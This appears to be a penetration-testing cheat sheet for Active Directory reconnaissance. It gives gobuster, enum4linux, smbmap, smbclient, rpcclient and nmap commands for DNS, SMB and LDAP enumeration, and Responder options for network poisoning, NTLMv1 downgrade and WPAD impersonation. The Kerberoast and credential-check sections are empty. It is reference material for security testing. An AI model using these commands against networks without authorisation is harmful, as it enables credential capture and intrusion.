Enumeration

  1. Recon Activity:

Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.

gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt
  1. Check for null and Guest access on smb services (this won't work on modern Windows versions):

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

rpcclient -U "" -N <IP> #No creds

smbclient --no-pass -L //<IP> # Null user
  1. Enumerate LDAP

nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>

ldapsearch

Check null credentials or if your credentials are valid:

  1. Kerberoast

  1. Poison the network

Running Responder

  • To run Responder with default settings: responder -I <Interface>

  • For more aggressive probing (with potential side effects): responder -I <Interface> -P -r -v

  • Techniques to capture NTLMv1 challenges/responses for easier cracking: responder -I <Interface> --lm --disable-ess

  • WPAD impersonation can be activated with: responder -I <Interface> --wpad

  • NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: responder.py -I <interface> -Pv

Last updated